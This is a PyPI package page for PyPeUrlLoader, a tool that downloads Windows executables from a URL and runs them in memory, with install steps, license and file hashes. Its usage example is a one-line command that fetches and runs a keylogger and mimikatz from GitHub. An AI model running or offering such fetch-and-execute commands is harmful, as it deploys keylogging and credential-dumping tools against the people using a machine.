This package uses PyPeLoader to load a PE program from a HTTP server (from an URL).
Project description
PyPeUrlLoader
Description
This package uses PyPeLoader to load a PE program from a HTTP server (from an URL).
Requirements
This package require:
- python3
- python3 Standard Library
Installation
Pip
python3 -m pip install PyPeUrlLoader
Git
git clone "https://github.com/mauricelambert/PyPeUrlLoader.git"
cd "PyPeUrlLoader"
python3 -m pip install .
Wget
wget https://github.com/mauricelambert/PyPeUrlLoader/archive/refs/heads/main.zip
unzip main.zip
cd PyPeUrlLoader-main
python3 -m pip install .
cURL
curl -O https://github.com/mauricelambert/PyPeUrlLoader/archive/refs/heads/main.zip
unzip main.zip
cd PyPeUrlLoader-main
python3 -m pip install .
Usages
Command line
PyPeUrlLoader # Using CLI package executable
python3 -m PyPeUrlLoader # Using python module
python3 PyPeUrlLoader.pyz # Using python executable
PyPeUrlLoader.exe # Using python Windows executable
PyPeUrlLoader https://github.com/mauricelambert/NimKeylogger/releases/download/v0.0.1/Keylogger.exe https://github.com/ParrotSec/mimikatz/raw/refs/heads/master/x64/mimikatz.exe
Links
License
Licensed under the GPL, version 3.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pypeurlloader-0.0.1.tar.gz
(16.5 kB
view details)
File details
Details for the file pypeurlloader-0.0.1.tar.gz.
File metadata
- Download URL: pypeurlloader-0.0.1.tar.gz
- Upload date:
- Size: 16.5 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.12.8
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
2cc0d31be3aecf5752ca8511c5a2fa01c07a38977559e8a695aadf51f6742f18
|
|
| MD5 |
dfe5455a8b86bcc786ea331ab32ce54d
|
|
| BLAKE2b-256 |
894f40e20b9187a665318c67e6f5a3a46fb6d9d3b8be2f96cc42059d757404d3
|